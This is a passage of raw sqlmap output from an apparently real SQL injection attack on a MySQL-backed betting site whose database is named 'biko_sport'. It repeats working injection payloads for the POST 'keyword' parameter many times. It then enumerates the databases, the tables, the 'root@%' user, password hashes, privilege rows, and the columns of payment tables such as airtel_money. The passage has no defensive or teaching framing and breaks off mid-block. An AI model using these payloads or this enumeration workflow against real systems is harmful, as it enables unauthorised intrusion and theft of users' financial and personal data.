  689. Title: AND boolean-based blind - WHERE or HAVING clause
  690. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  691.  
  692. Type: error-based
  693. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  694. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  695.  
  696. Type: AND/OR time-based blind
  697. Title: MySQL > 5.0.11 AND time-based blind
  698. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  699. ---
  700. web application technology: PHP 5.6.33, Nginx
  701. back-end DBMS: MySQL 5.0
  702. available databases [5]:
  703. [*] biko_sport
  704. [*] information_schema
  705. [*] mysql
  706. [*] performance_schema
  707. [*] sys
  708.  
  709. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  710. ---
  711. Place: POST
  712. Parameter: keyword
  713. Type: boolean-based blind
  714. Title: AND boolean-based blind - WHERE or HAVING clause
  715. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  716.  
  717. Type: error-based
  718. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  719. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  720.  
  721. Type: AND/OR time-based blind
  722. Title: MySQL > 5.0.11 AND time-based blind
  723. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  724. ---
  725. web application technology: PHP 5.6.33, Nginx
  726. back-end DBMS: MySQL 5.0
  727. Database: sys
  728. [101 tables]
  729. +-----------------------------------------------+
  730. | session |
  731. | version |
  732. | host_summary |
  733. | host_summary_by_file_io |
  734. | host_summary_by_file_io_type |
  735. | host_summary_by_stages |
  736. | host_summary_by_statement_latency |
  737. | host_summary_by_statement_type |
  738. | innodb_buffer_stats_by_schema |
  739. | innodb_buffer_stats_by_table |
  740. | innodb_lock_waits |
  741. | io_by_thread_by_latency |
  742. | io_global_by_file_by_bytes |
  743. | io_global_by_file_by_latency |
  744. | io_global_by_wait_by_bytes |
  745. | io_global_by_wait_by_latency |
  746. | latest_file_io |
  747. | memory_by_host_by_current_bytes |
  748. | memory_by_thread_by_current_bytes |
  749. | memory_by_user_by_current_bytes |
  750. | memory_global_by_current_bytes |
  751. | memory_global_total |
  752. | metrics |
  753. | processlist |
  754. | ps_check_lost_instrumentation |
  755. | schema_auto_increment_columns |
  756. | schema_index_statistics |
  757. | schema_object_overview |
  758. | schema_redundant_indexes |
  759. | schema_table_lock_waits |
  760. | schema_table_statistics |
  761. | schema_table_statistics_with_buffer |
  762. | schema_tables_with_full_table_scans |
  763. | schema_unused_indexes |
  764. | session_ssl_status |
  765. | statement_analysis |
  766. | statements_with_errors_or_warnings |
  767. | statements_with_full_table_scans |
  768. | statements_with_runtimes_in_95th_percentile |
  769. | statements_with_sorting |
  770. | statements_with_temp_tables |
  771. | sys_config |
  772. | user_summary |
  773. | user_summary_by_file_io |
  774. | user_summary_by_file_io_type |
  775. | user_summary_by_stages |
  776. | user_summary_by_statement_latency |
  777. | user_summary_by_statement_type |
  778. | wait_classes_global_by_avg_latency |
  779. | wait_classes_global_by_latency |
  780. | waits_by_host_by_latency |
  781. | waits_by_user_by_latency |
  782. | waits_global_by_latency |
  783. | x$host_summary |
  784. | x$host_summary_by_file_io |
  785. | x$host_summary_by_file_io_type |
  786. | x$host_summary_by_stages |
  787. | x$host_summary_by_statement_latency |
  788. | x$host_summary_by_statement_type |
  789. | x$innodb_buffer_stats_by_schema |
  790. | x$innodb_buffer_stats_by_table |
  791. | x$innodb_lock_waits |
  792. | x$io_by_thread_by_latency |
  793. | x$io_global_by_file_by_bytes |
  794. | x$io_global_by_file_by_latency |
  795. | x$io_global_by_wait_by_bytes |
  796. | x$io_global_by_wait_by_latency |
  797. | x$latest_file_io |
  798. | x$memory_by_host_by_current_bytes |
  799. | x$memory_by_thread_by_current_bytes |
  800. | x$memory_by_user_by_current_bytes |
  801. | x$memory_global_by_current_bytes |
  802. | x$memory_global_total |
  803. | x$processlist |
  804. | x$ps_digest_95th_percentile_by_avg_us |
  805. | x$ps_digest_avg_latency_distribution |
  806. | x$ps_schema_table_statistics_io |
  807. | x$schema_flattened_keys |
  808. | x$schema_index_statistics |
  809. | x$schema_table_lock_waits |
  810. | x$schema_table_statistics |
  811. | x$schema_table_statistics_with_buffer |
  812. | x$schema_tables_with_full_table_scans |
  813. | x$session |
  814. | x$statement_analysis |
  815. | x$statements_with_errors_or_warnings |
  816. | x$statements_with_full_table_scans |
  817. | x$statements_with_runtimes_in_95th_percentile |
  818. | x$statements_with_sorting |
  819. | x$statements_with_temp_tables |
  820. | x$user_summary |
  821. | x$user_summary_by_file_io |
  822. | x$user_summary_by_file_io_type |
  823. | x$user_summary_by_stages |
  824. | x$user_summary_by_statement_latency |
  825. | x$user_summary_by_statement_type |
  826. | x$wait_classes_global_by_avg_latency |
  827. | x$wait_classes_global_by_latency |
  828. | x$waits_by_host_by_latency |
  829. | x$waits_by_user_by_latency |
  830. | x$waits_global_by_latency |
  831. +-----------------------------------------------+
  832.  
  833. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  834. ---
  835. Place: POST
  836. Parameter: keyword
  837. Type: boolean-based blind
  838. Title: AND boolean-based blind - WHERE or HAVING clause
  839. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  840.  
  841. Type: error-based
  842. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  843. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  844.  
  845. Type: AND/OR time-based blind
  846. Title: MySQL > 5.0.11 AND time-based blind
  847. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  848. ---
  849. web application technology: PHP 5.6.33, Nginx
  850. back-end DBMS: MySQL 5.0
  851. current user: 'root@%'
  852. current user is DBA: False
  853. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  854. ---
  855. Place: POST
  856. Parameter: keyword
  857. Type: boolean-based blind
  858. Title: AND boolean-based blind - WHERE or HAVING clause
  859. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  860.  
  861. Type: error-based
  862. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  863. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  864.  
  865. Type: AND/OR time-based blind
  866. Title: MySQL > 5.0.11 AND time-based blind
  867. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  868. ---
  869. web application technology: PHP 5.6.33, Nginx
  870. back-end DBMS: MySQL 5.0
  871. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  872. ---
  873. Place: POST
  874. Parameter: keyword
  875. Type: boolean-based blind
  876. Title: AND boolean-based blind - WHERE or HAVING clause
  877. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  878.  
  879. Type: error-based
  880. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  881. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  882.  
  883. Type: AND/OR time-based blind
  884. Title: MySQL > 5.0.11 AND time-based blind
  885. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  886. ---
  887. web application technology: PHP 5.6.33, Nginx
  888. back-end DBMS: MySQL 5.0
  889. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  890. ---
  891. Place: POST
  892. Parameter: keyword
  893. Type: boolean-based blind
  894. Title: AND boolean-based blind - WHERE or HAVING clause
  895. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  896.  
  897. Type: error-based
  898. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  899. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  900.  
  901. Type: AND/OR time-based blind
  902. Title: MySQL > 5.0.11 AND time-based blind
  903. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  904. ---
  905. web application technology: PHP 5.6.33, Nginx
  906. back-end DBMS: MySQL 5.0
  907. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  908. ---
  909. Place: POST
  910. Parameter: keyword
  911. Type: boolean-based blind
  912. Title: AND boolean-based blind - WHERE or HAVING clause
  913. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  914.  
  915. Type: error-based
  916. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  917. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  918.  
  919. Type: AND/OR time-based blind
  920. Title: MySQL > 5.0.11 AND time-based blind
  921. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  922. ---
  923. web application technology: PHP 5.6.33, Nginx
  924. back-end DBMS: MySQL 5.0
  925. available databases [5]:
  926. [*] biko_sport
  927. [*] information_schema
  928. [*] mysql
  929. [*] performance_schema
  930. [*] sys
  931.  
  932. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  933. ---
  934. Place: POST
  935. Parameter: keyword
  936. Type: boolean-based blind
  937. Title: AND boolean-based blind - WHERE or HAVING clause
  938. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  939.  
  940. Type: error-based
  941. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  942. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  943.  
  944. Type: AND/OR time-based blind
  945. Title: MySQL > 5.0.11 AND time-based blind
  946. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  947. ---
  948. web application technology: PHP 5.6.33, Nginx
  949. back-end DBMS: MySQL 5.0
  950. Database: mysql
  951. [33 tables]
  952. +---------------------------+
  953. | system_user |
  954. | user |
  955. | columns_priv |
  956. | db |
  957. | engine_cost |
  958. | event |
  959. | func |
  960. | general_log |
  961. | gtid_executed |
  962. | heartbeat |
  963. | help_category |
  964. | help_keyword |
  965. | help_relation |
  966. | help_topic |
  967. | innodb_index_stats |
  968. | innodb_table_stats |
  969. | ndb_binlog_index |
  970. | plugin |
  971. | proc |
  972. | procs_priv |
  973. | proxies_priv |
  974. | server_cost |
  975. | servers |
  976. | slave_master_info |
  977. | slave_relay_log_info |
  978. | slave_worker_info |
  979. | slow_log |
  980. | tables_priv |
  981. | time_zone |
  982. | time_zone_leap_second |
  983. | time_zone_name |
  984. | time_zone_transition |
  985. | time_zone_transition_type |
  986. +---------------------------+
  987.  
  988. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  989. ---
  990. Place: POST
  991. Parameter: keyword
  992. Type: boolean-based blind
  993. Title: AND boolean-based blind - WHERE or HAVING clause
  994. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  995.  
  996. Type: error-based
  997. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  998. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  999.  
  1000. Type: AND/OR time-based blind
  1001. Title: MySQL > 5.0.11 AND time-based blind
  1002. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1003. ---
  1004. web application technology: PHP 5.6.33, Nginx
  1005. back-end DBMS: MySQL 5.0
  1006. Database: mysql
  1007. Table: db
  1008. [1 entry]
  1009. +-----+-----------+-----------+-----------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+----------------+-----------------+------------------+------------------+--------------------+---------------------+-----------------------+
  1010. | Db | Host | `User` | Drop_priv | Grant_priv | Alter_priv | Index_priv | Event_priv | Create_priv | Insert_priv | Select_priv | Update_priv | Delete_priv | Execute_priv | Trigger_priv | Show_view_priv | References_priv | Create_view_priv | Lock_tables_priv | Alter_routine_priv | Create_routine_priv | Create_tmp_table_priv |
  1011. +-----+-----------+-----------+-----------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+----------------+-----------------+------------------+------------------+--------------------+---------------------+-----------------------+
  1012. | sys | localhost | mysql.sys | N | N | N | N | N | N | N | N | N | N | N | Y | N | N | N | N | N | N | N |
  1013. +-----+-----------+-----------+-----------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+----------------+-----------------+------------------+------------------+--------------------+---------------------+-----------------------+
  1014.  
  1015. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1016. ---
  1017. Place: POST
  1018. Parameter: keyword
  1019. Type: boolean-based blind
  1020. Title: AND boolean-based blind - WHERE or HAVING clause
  1021. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1022.  
  1023. Type: error-based
  1024. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1025. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1026.  
  1027. Type: AND/OR time-based blind
  1028. Title: MySQL > 5.0.11 AND time-based blind
  1029. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1030. ---
  1031. web application technology: PHP 5.6.33, Nginx
  1032. back-end DBMS: MySQL 5.0
  1033. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1034. ---
  1035. Place: POST
  1036. Parameter: keyword
  1037. Type: boolean-based blind
  1038. Title: AND boolean-based blind - WHERE or HAVING clause
  1039. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1040.  
  1041. Type: error-based
  1042. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1043. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1044.  
  1045. Type: AND/OR time-based blind
  1046. Title: MySQL > 5.0.11 AND time-based blind
  1047. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1048. ---
  1049. web application technology: PHP 5.6.33, Nginx
  1050. back-end DBMS: MySQL 5.0
  1051. available databases [5]:
  1052. [*] biko_sport
  1053. [*] information_schema
  1054. [*] mysql
  1055. [*] performance_schema
  1056. [*] sys
  1057.  
  1058. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1059. ---
  1060. Place: POST
  1061. Parameter: keyword
  1062. Type: boolean-based blind
  1063. Title: AND boolean-based blind - WHERE or HAVING clause
  1064. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1065.  
  1066. Type: error-based
  1067. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1068. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1069.  
  1070. Type: AND/OR time-based blind
  1071. Title: MySQL > 5.0.11 AND time-based blind
  1072. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1073. ---
  1074. web application technology: PHP 5.6.33, Nginx
  1075. back-end DBMS: MySQL 5.0
  1076. current user: 'root@%'
  1077. database management system users password hashes:
  1078. [*] mysql.sys [1]:
  1079. password hash: NULL
  1080. [*] root [1]:
  1081. password hash: NULL
  1082.  
  1083. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1084. ---
  1085. Place: POST
  1086. Parameter: keyword
  1087. Type: boolean-based blind
  1088. Title: AND boolean-based blind - WHERE or HAVING clause
  1089. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1090.  
  1091. Type: error-based
  1092. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1093. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1094.  
  1095. Type: AND/OR time-based blind
  1096. Title: MySQL > 5.0.11 AND time-based blind
  1097. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1098. ---
  1099. web application technology: PHP 5.6.33, Nginx
  1100. back-end DBMS: MySQL 5.0
  1101. Database: biko_sport
  1102. [151 tables]
  1103. +--------------------------+
  1104. | SEQUENCE |
  1105. | match |
  1106. | transaction |
  1107. | user |
  1108. | account_freeze |
  1109. | airtel_money |
  1110. | airtel_money_rate |
  1111. | airtel_subs_blast |
  1112. | arch_live_match |
  1113. | auth_assignment |
  1114. | auth_item |
  1115. | auth_item_child |
  1116. | auth_rule |
  1117. | backup_profile |
  1118. | bb |
  1119. | bet |
  1120. | bet_discount |
  1121. | bet_slip |
  1122. | bet_slip_check |
  1123. | bet_slip_temp |
  1124. | bet_status_changes |
  1125. | biko_point |
  1126. | biko_point_bet |
  1127. | biko_point_summary |
  1128. | biko_point_trx |
  1129. | biko_profile_names |
  1130. | bleague_competition |
  1131. | bleague_event_odd |
  1132. | bleague_match |
  1133. | bonus_bet |
  1134. | bonus_bet_count |
  1135. | bonus_trx |
  1136. | card_summary |
  1137. | category |
  1138. | competition |
  1139. | delivery_report |
  1140. | early_bet_white_list |
  1141. | event |
  1142. | event_odd |
  1143. | free_bet |
  1144. | free_bet_transactions |
  1145. | ga |
  1146. | game |
  1147. | game_ids |
  1148. | game_request |
  1149. | gr_profile_player |
  1150. | gr_tickets |
  1151. | inactive2_subs |
  1152. | inactive_nums |
  1153. | inactive_profile |
  1154. | inbox |
  1155. | jackpot_bet |
  1156. | jackpot_event |
  1157. | jackpot_match |
  1158. | jackpot_trx |
  1159. | jackpot_type |
  1160. | jackpot_winner |
  1161. | jp_bet_cancel_data |
  1162. | jpbonus_award |
  1163. | latest_alive |
  1164. | live_match |
  1165. | live_meta_history |
  1166. | live_odds |
  1167. | live_odds_change |
  1168. | live_odds_meta |
  1169. | ls_betmatch |
  1170. | ls_card |
  1171. | ls_category |
  1172. | ls_city |
  1173. | ls_country |
  1174. | ls_goal |
  1175. | ls_line_up |
  1176. | ls_livescore_data |
  1177. | ls_match_detail |
  1178. | ls_player |
  1179. | ls_referee |
  1180. | ls_scores |
  1181. | ls_sport |
  1182. | ls_substitution |
  1183. | ls_team |
  1184. | ls_tournament |
  1185. | ls_venue |
  1186. | matchid |
  1187. | menu |
  1188. | migration |
  1189. | missed_withdrawals |
  1190. | mobile_app_profile |
  1191. | mobile_app_version |
  1192. | mpesa_rate |
  1193. | mpesa_transaction |
  1194. | msi |
  1195. | mts_exception |
  1196. | mts_ticket_submit |
  1197. | mts_validation_code |
  1198. | network_charge_range |
  1199. | nums_pro |
  1200. | odd_history |
  1201. | odd_key_alias |
  1202. | odd_type |
  1203. | odds_history |
  1204. | odds_subtype |
  1205. | outbox |
  1206. | outcome |
  1207. | outcome_backup |
  1208. | outcome_o |
  1209. | outcome_old |
  1210. | outcome_test |
  1211. | outright |
  1212. | outright_competitor |
  1213. | outright_odd |
  1214. | outright_odd_history |
  1215. | outright_outcome |
  1216. | paybill_tariff |
  1217. | playground |
  1218. | profile |
  1219. | profile_balance |
  1220. | profile_bonus |
  1221. | profile_setting |
  1222. | profile_settings |
  1223. | recon_references |
  1224. | reconciliation |
  1225. | running_balance |
  1226. | seven_aggregator_request |
  1227. | shop_deposits |
  1228. | shop_withdrawals |
  1229. | speed_dial_history |
  1230. | speed_dial_profile |
  1231. | sport |
  1232. | sqlmapfile |
  1233. | talksport |
  1234. | team |
  1235. | ticket_settlement |
  1236. | tournament |
  1237. | traffic_analytic |
  1238. | types |
  1239. | user_bet_cancel |
  1240. | ux_categories |
  1241. | ux_todays_highlights |
  1242. | virtual_competition |
  1243. | virtual_event_odd |
  1244. | virtual_latest_alive |
  1245. | virtual_match |
  1246. | virtual_odd_type |
  1247. | virtual_odds |
  1248. | virtual_odds_meta |
  1249. | virtual_outcome |
  1250. | virtual_sport |
  1251. | void_bet_slip |
  1252. | winner |
  1253. | withdraw_references |
  1254. | withdrawal |
  1255. +--------------------------+
  1256.  
  1257. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1258. ---
  1259. Place: POST
  1260. Parameter: keyword
  1261. Type: boolean-based blind
  1262. Title: AND boolean-based blind - WHERE or HAVING clause
  1263. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1264.  
  1265. Type: error-based
  1266. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1267. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1268.  
  1269. Type: AND/OR time-based blind
  1270. Title: MySQL > 5.0.11 AND time-based blind
  1271. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1272. ---
  1273. web application technology: PHP 5.6.33, Nginx
  1274. back-end DBMS: MySQL 5.0
  1275. Database: biko_sport
  1276. Table: airtel_money
  1277. [10 columns]
  1278. +-------------------+---------------+
  1279. | Column | Type |
  1280. +-------------------+---------------+
  1281. | account_no | varchar(100) |
  1282. | airtel_money_code | varchar(50) |
  1283. | amount | decimal(10,2) |
  1284. | created | datetime |
  1285. | first_name | varchar(120) |
  1286. | id | bigint(20) |
  1287. | last_name | varchar(120) |
  1288. | modified | timestamp |
  1289. | msisdn | varchar(30) |
  1290. | time_stamp | datetime |
  1291. +-------------------+---------------+
  1292.  
  1293. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1294. ---
  1295. Place: POST
  1296. Parameter: keyword
  1297. Type: boolean-based blind
  1298. Title: AND boolean-based blind - WHERE or HAVING clause
  1299. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1300.  
  1301. Type: error-based
  1302. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1303. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1304.  
  1305. Type: AND/OR time-based blind
  1306. Title: MySQL > 5.0.11 AND time-based blind
  1307. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1308. ---
  1309. web application technology: PHP 5.6.33, Nginx
  1310. back-end DBMS: MySQL 5.0
  1311. Database: biko_sport
  1312. Table: airtel_money
  1313. [0 entries]
  1314. +----+--------+--------+---------+----------+-----------+------------+------------+------------+-------------------+
  1315. | id | msisdn | amount | created | modified | last_name | first_name | time_stamp | account_no | airtel_money_code |
  1316. +----+--------+--------+---------+----------+-----------+------------+------------+------------+-------------------+
  1317. +----+--------+--------+---------+----------+-----------+------------+------------+------------+-------------------+
  1318.  
  1319. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1320. ---
  1321. Place: POST
  1322. Parameter: keyword
  1323. Type: boolean-based blind
  1324. Title: AND boolean-based blind - WHERE or HAVING clause
  1325. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1326.  
  1327. Type: error-based
  1328. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1329. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1330.  
  1331. Type: AND/OR time-based blind
  1332. Title: MySQL > 5.0.11 AND time-based blind
  1333. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1334. ---
  1335. web application technology: PHP 5.6.33, Nginx
  1336. back-end DBMS: MySQL 5.0
  1337. Database: biko_sport
  1338. Table: SEQUENCE
  1339. [2 columns]
  1340. +-----------+---------------+
  1341. | Column | Type |
  1342. +-----------+---------------+
  1343. | SEQ_COUNT | decimal(38,0) |
  1344. | SEQ_NAME | varchar(50) |
  1345. +-----------+---------------+
  1346.  
  1347. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1348. ---
  1349. Place: POST
  1350. Parameter: keyword
  1351. Type: boolean-based blind
  1352. Title: AND boolean-based blind - WHERE or HAVING clause
  1353. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1354.  
  1355. Type: error-based
  1356. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1357. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1358.  
  1359. Type: AND/OR time-based blind
  1360. Title: MySQL > 5.0.11 AND time-based blind
  1361. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1362. ---
  1363. web application technology: PHP 5.6.33, Nginx
  1364. back-end DBMS: MySQL 5.0
  1365. Database: biko_sport
  1366. Table: SEQUENCE
  1367. [0 entries]
  1368. +----------+-----------+
  1369. | SEQ_NAME | SEQ_COUNT |
  1370. +----------+-----------+
  1371. +----------+-----------+
  1372.  
  1373. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1374. ---
  1375. Place: POST
  1376. Parameter: keyword
  1377. Type: boolean-based blind
  1378. Title: AND boolean-based blind - WHERE or HAVING clause
  1379. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1380.  
  1381. Type: error-based
  1382. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1383. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1384.  
  1385. Type: AND/OR time-based blind
  1386. Title: MySQL > 5.0.11 AND time-based blind
  1387. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1388. ---
  1389. web application technology: PHP 5.6.33, Nginx
  1390. back-end DBMS: MySQL 5.0
  1391. Database: biko_sport
  1392. Table: auth_assignment
  1393. [3 columns]
  1394. +------------+-------------+
  1395. | Column | Type |
  1396. +------------+-------------+
  1397. | created_at | int(11) |
  1398. | item_name | varchar(64) |
  1399. | user_id | varchar(64) |
  1400. +------------+-------------+
  1401.  
  1402. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1403. ---
  1404. Place: POST
  1405. Parameter: keyword
  1406. Type: boolean-based blind
  1407. Title: AND boolean-based blind - WHERE or HAVING clause
  1408. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1409.  
  1410. Type: error-based
  1411. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1412. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1413.  
  1414. Type: AND/OR time-based blind
  1415. Title: MySQL > 5.0.11 AND time-based blind
